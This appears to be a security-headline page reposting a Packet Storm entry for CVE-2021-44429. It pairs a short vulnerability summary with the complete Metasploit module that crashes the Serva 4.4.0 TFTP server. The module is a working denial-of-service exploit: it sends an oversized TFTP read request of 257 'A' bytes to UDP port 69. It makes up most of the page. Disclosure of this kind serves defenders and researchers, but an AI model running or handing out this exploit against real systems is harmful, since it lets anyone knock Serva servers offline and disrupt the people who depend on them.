Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-44429: Serva 4.4.0 TFTP Remote Buffer Overflow ≈ Packet Storm

Serva 4.4.0 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1, a related issue to CVE-2013-0145.

CVE
#windows#dos#git
# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)# Date: 2021-11-23# Exploit Author: Yehia Elghaly# Vendor Homepage: https://www.vercot.com/# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip# Tested Version: 4.4.0# Tested on: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Udp  include Msf::Auxiliary::Dos  Rank = ExcellentRanking  def initialize(info = {})    super(update_info(info,      'Name'           => 'Serva 4.4.0 TFTP Remote Buffer Overflow',      'Description'    => %q{        The Serva TFTP server version 4.4.0 can be        brought down by sending a special Read request.      },      'Author'         => 'Yehia Elghaly',      'License'        => MSF_LICENSE,      'DisclosureDate' => '2021-11-23'))    register_options([Opt::RPORT(69)])  end  def run    connect_udp    print_status("Sending Read request...")    sploit  = "\x00\x01"    sploit += "A" * 257    sploit += "\x00"    sploit += "netascii"    sploit += "\x00"    udp_sock.put(sploit)    disconnect_udp  endend

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907